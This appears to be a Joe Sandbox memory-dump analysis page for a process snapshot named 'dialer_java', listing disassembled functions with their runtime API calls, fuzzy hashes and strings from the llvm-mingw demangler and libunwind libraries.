Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
Instruction ID: 41da1b2791f664661f9114a18d93dbb167ae9029efe4bf391d80179e675d22fb
Opcode Fuzzy Hash: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
Instruction Fuzzy Hash: 2FB181B6A05B8682DE39CF56F54426DA3A1EB54FC0F009572CB8E87BA0DF2CE855C704

Function 00007FF695DDFED0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDFF80
malloc.MSVCRT ref: 00007FF695DDFF9A
memcpy.MSVCRT ref: 00007FF695DDFFB9
free.MSVCRT ref: 00007FF695DE0040
_assert.MSVCRT ref: 00007FF695DE006B
free.MSVCRT ref: 00007FF695DE0085
realloc.MSVCRT ref: 00007FF695DE00F7
memcpy.MSVCRT ref: 00007FF695DE0111

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DE005E
Index < size() && "Invalid access!", xrefs: 00007FF695DE0057

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: freememcpyrealloc$_assertmalloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Index < size() && "Invalid access!"
API String ID: 3641880838-4289452498
Opcode ID: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
Instruction ID: 1d2c4231145deb46316c3b127655cc1304587e15a4d60367b04ac8c8b8a244ef
Opcode Fuzzy Hash: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
Instruction Fuzzy Hash: C851C262A19B4581EA31DB15E84027DA7A0FB98FC4F145271EE8D83B55DF3CD989C304

Function 00007FF695DD14B4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 171COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD15B8
memcpy.MSVCRT ref: 00007FF695DD15D7
realloc.MSVCRT ref: 00007FF695DD19E9
_assert.MSVCRT ref: 00007FF695DD1E69

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD1E5C
_, xrefs: 00007FF695DD198D
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF695DD1E55

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assertmallocmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$_$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 2036919697-1558868925
Opcode ID: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
Instruction ID: 8666d913196a43881b19188eb9b4ee3f1b5264540f84832d2f738a27e8fa49b7
Opcode Fuzzy Hash: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
Instruction Fuzzy Hash: EF61B33260AB4682EA71DB55F4402BAA7E4EB44F80F441276CB8E87B91DF3CE94DC744

Function 00007FF695DD6D70 Relevance: 16.8, APIs: 11, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD6DA1
realloc.MSVCRT ref: 00007FF695DD6E7B
realloc.MSVCRT ref: 00007FF695DD6ED5
memcpy.MSVCRT ref: 00007FF695DD6EF3
realloc.MSVCRT ref: 00007FF695DD6F2E
realloc.MSVCRT ref: 00007FF695DD6F8D
realloc.MSVCRT ref: 00007FF695DD6FE9
realloc.MSVCRT ref: 00007FF695DD703E
memcpy.MSVCRT ref: 00007FF695DD705B
realloc.MSVCRT ref: 00007FF695DD70A2
memcpy.MSVCRT ref: 00007FF695DD70BC

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy$malloc
String ID:
API String ID: 774493741-0
Opcode ID: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
Instruction ID: ddeefe4184db139a49b0aea8a3bc3ab9d3e87ae4fc71aab091238869e89b3c3e
Opcode Fuzzy Hash: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
Instruction Fuzzy Hash: D9A180B2A05B8682EA25CF55F4443ADA3A1EB14BC0F049272DF8D47B91EF3CE9958304

Function 00007FF695DD9150 Relevance: 16.7, APIs: 11, Instructions: 246COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD9198
realloc.MSVCRT ref: 00007FF695DD9220
realloc.MSVCRT ref: 00007FF695DD9279
memcpy.MSVCRT ref: 00007FF695DD9297
realloc.MSVCRT ref: 00007FF695DD92CF
realloc.MSVCRT ref: 00007FF695DD931B
realloc.MSVCRT ref: 00007FF695DD9380
realloc.MSVCRT ref: 00007FF695DD93D9
memcpy.MSVCRT ref: 00007FF695DD93F7
realloc.MSVCRT ref: 00007FF695DD942F
realloc.MSVCRT ref: 00007FF695DD94A2

Part of subcall function 00007FF695DD4F60: realloc.MSVCRT ref: 00007FF695DD4FED
Part of subcall function 00007FF695DD4F60: realloc.MSVCRT ref: 00007FF695DD506D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
Instruction ID: 3cd743a8f1f2ca2fc1d8fffa40bf19dfc45bd6f1cec3c423303166bb9c96cbd9
Opcode Fuzzy Hash: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
Instruction Fuzzy Hash: C0A172B2A06B4682DA39CF52F450379A3A1EB54BC0F449672CB8E47B95EF3DE9458304

Function 00007FF695DC7780 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 412COMMON

Download Yara Rule

Strings

., xrefs: 00007FF695DC78F4

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
Instruction ID: 1349b83e66954715d846a00826d1a2521d10d9de76279204533b4e56deef48e3
Opcode Fuzzy Hash: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
Instruction Fuzzy Hash: C1024F72A196428BEB748E16E05077A77E1EB14F40F006279DB9EC6B81DF2CF949C708

Function 00007FF695DE21E0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 391COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00007FF695DE2439

Strings

., xrefs: 00007FF695DE2354

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fputc
String ID: .
API String ID: 1992160199-248832578
Opcode ID: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
Instruction ID: 12de5b1e82defee84b8998071672e0ad1f015f01a475829de75cad77e9353d07
Opcode Fuzzy Hash: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
Instruction Fuzzy Hash: 35F17172A086468BF7748A15E55073EB7E1EB16B40F046279CB9E86A81DF2CFC4DC708

Function 00007FF695DCCEA0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DCCFA9

Strings

struct, xrefs: 00007FF695DCCEA2
string literal, xrefs: 00007FF695DCD033

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: string literal$struct
API String ID: 471065373-3644149429
Opcode ID: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
Instruction ID: 4f7ed0430444f5a108d983727a9a267756e22fcc4ec463698d6294f2888c0518
Opcode Fuzzy Hash: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
Instruction Fuzzy Hash: 07D1C472A0AB8245EE75AB15E84037963D1EF05F80F5456B1CB9D87781DF3CE85A8308

Function 00007FF695DD1129 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD11E6
memcpy.MSVCRT ref: 00007FF695DD1207

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF695DD1E55

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: mallocmemcpy
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 4276657696-3503049562
Opcode ID: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction ID: ca0827b36b16f5cb3ee0b2c8777df60f399803681606671d7f3ffec5358b2751
Opcode Fuzzy Hash: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction Fuzzy Hash: C7719232609B4682EA71DB55F4402BAB3E0FB84B80F445276DB8E87B55EF3CE949C744

Function 00007FF695DC62B0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF695DC6377
fputwc.MSVCRT ref: 00007FF695DC63E3
fwprintf.MSVCRT ref: 00007FF695DC64AD
fwprintf.MSVCRT ref: 00007FF695DC64C7

Strings

%*.*S, xrefs: 00007FF695DC6303
%.*S, xrefs: 00007FF695DC64A0
%-*.*S, xrefs: 00007FF695DC64BD

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fwprintf$fputwcstrlen
String ID: %*.*S$%-*.*S$%.*S
API String ID: 3854221471-2115465065
Opcode ID: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
Instruction ID: 462b536b4157f36bae20532671922b6341d97eb11f8db6c427d4173ec9be8087
Opcode Fuzzy Hash: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
Instruction Fuzzy Hash: 9D514072A1C6028AEB748A1AF05063A72E1EB54F50F0462B5DB5FC7691DF3CEC49CB08

Function 00007FF695DC4810 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 93COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF695DC484A
abort.MSVCRT ref: 00007FF695DC484F
fflush.MSVCRT ref: 00007FF695DC489A
abort.MSVCRT ref: 00007FF695DC489F
RtlVirtualUnwind.KERNEL32 ref: 00007FF695DC4904

Strings

float registers unimplemented, xrefs: 00007FF695DC4831, 00007FF695DC4881
getFloatReg, xrefs: 00007FF695DC482A
setFloatReg, xrefs: 00007FF695DC487A
libunwind: %s - %s, xrefs: 00007FF695DC4823, 00007FF695DC4873

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: abortfflush$UnwindVirtual
String ID: float registers unimplemented$getFloatReg$libunwind: %s - %s$setFloatReg
API String ID: 3704712045-981669299
Opcode ID: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
Instruction ID: 01591a8c9689a3a5888f57d9846c02d7fbdd99b5669c7b2b9fcf1157f4a633da
Opcode Fuzzy Hash: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
Instruction Fuzzy Hash: C131A061A09B9681EB24AB65F8453F963A5EF44F84F005276DA8E83751CE3CD94EC308

Function 00007FF695DC60C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

fputwc.MSVCRT ref: 00007FF695DC6195
fwprintf.MSVCRT ref: 00007FF695DC6277

Strings

%*.*s, xrefs: 00007FF695DC610D
%s , xrefs: 00007FF695DC60C1, 00007FF695DC60C2
%-*.*s, xrefs: 00007FF695DC626D
%.*s, xrefs: 00007FF695DC6250

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fputwcfwprintf
String ID: %*.*s$%-*.*s$%.*s$%s
API String ID: 3232229890-407542676
Opcode ID: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction ID: 07479075e7ea0273405c94cf15ce17c2eadb3c1274ba8c4d74195ddb6e93ed66
Opcode Fuzzy Hash: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction Fuzzy Hash: 32515232A146028BEF748A1AF45063AB3E1EB54F51B106379DB5EC7681DF2CEC49CB08

Function 00007FF695DD80F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF695DD8153
realloc.MSVCRT ref: 00007FF695DD81A9
realloc.MSVCRT ref: 00007FF695DD820D
memcpy.MSVCRT ref: 00007FF695DD8227
realloc.MSVCRT ref: 00007FF695DD825F

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD8146
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF695DD813F
'unnamed, xrefs: 00007FF695DD81BE

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$_assertmemcpy
String ID: 'unnamed$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists
API String ID: 2140428464-3850676658
Opcode ID: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction ID: c2bac9156ad9ab1abf8a55d0948f07712d2e55d3dafc3f88010352b16df92828
Opcode Fuzzy Hash: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction Fuzzy Hash: 054162B2A06F4282DE298B46F44427DA3A1EB54FC4F549672CB9E47791EF3CE9498304

Function 00007FF695DCD9A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DCDA1E
malloc.MSVCRT ref: 00007FF695DCDA57
memcpy.MSVCRT ref: 00007FF695DCDA9B
_assert.MSVCRT ref: 00007FF695DCDAF8
_assert.MSVCRT ref: 00007FF695DCDB12

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DCDAEB, 00007FF695DCDB05
Index <= size() && "dropBack() can't expand!", xrefs: 00007FF695DCDAFE
FromPosition <= Names.size(), xrefs: 00007FF695DCDAE4

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assertmalloc$memcpy
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$FromPosition <= Names.size()$Index <= size() && "dropBack() can't expand!"
API String ID: 4247363904-2992651634
Opcode ID: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
Instruction ID: 62b86fc5160bc4475dc2a9a926dd3f72d3fea498374b61b5297c703d780b2490
Opcode Fuzzy Hash: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
Instruction Fuzzy Hash: 2C41F072B19A4284EE24EB01FC443A973A0FB14B84F485275EE4D87791EF3CE989C308

Function 00007FF695DC3F50 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF695DC3F8F

Part of subcall function 00007FF695DC4120: fflush.MSVCRT ref: 00007FF695DC422D
Part of subcall function 00007FF695DC4120: fflush.MSVCRT ref: 00007FF695DC4287

RtlUnwindEx.KERNEL32 ref: 00007FF695DC40A6
fflush.MSVCRT ref: 00007FF695DC4106
abort.MSVCRT ref: 00007FF695DC410B

Strings

libunwind: _Unwind_Resume(ex_obj=%p), xrefs: 00007FF695DC3F73
_Unwind_Resume() can't return, xrefs: 00007FF695DC40ED
_Unwind_Resume, xrefs: 00007FF695DC40E6
libunwind: %s - %s, xrefs: 00007FF695DC40DF

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflush$Unwindabort
String ID: _Unwind_Resume$_Unwind_Resume() can't return$libunwind: %s - %s$libunwind: _Unwind_Resume(ex_obj=%p)
API String ID: 3252057912-3900785416
Opcode ID: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
Instruction ID: 81eca4ce1868541afee9d61074593ee4c66e060931fff5c10f54fe4692b2ec3c
Opcode Fuzzy Hash: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
Instruction Fuzzy Hash: 99414A21D18BC181F6369B14E4063FAA3B4FFD9B84F006326EA8842665EF79D6D6C744

Function 00007FF695DC45B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF695DC46AC
abort.MSVCRT ref: 00007FF695DC46B1

Strings

getReg, xrefs: 00007FF695DC468C
unsupported register, xrefs: 00007FF695DC4693, 00007FF695DC47DA
setReg, xrefs: 00007FF695DC47D3
libunwind: %s - %s, xrefs: 00007FF695DC4685, 00007FF695DC47CC

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: abortfflush
String ID: getReg$libunwind: %s - %s$setReg$unsupported register
API String ID: 4129902348-1024193272
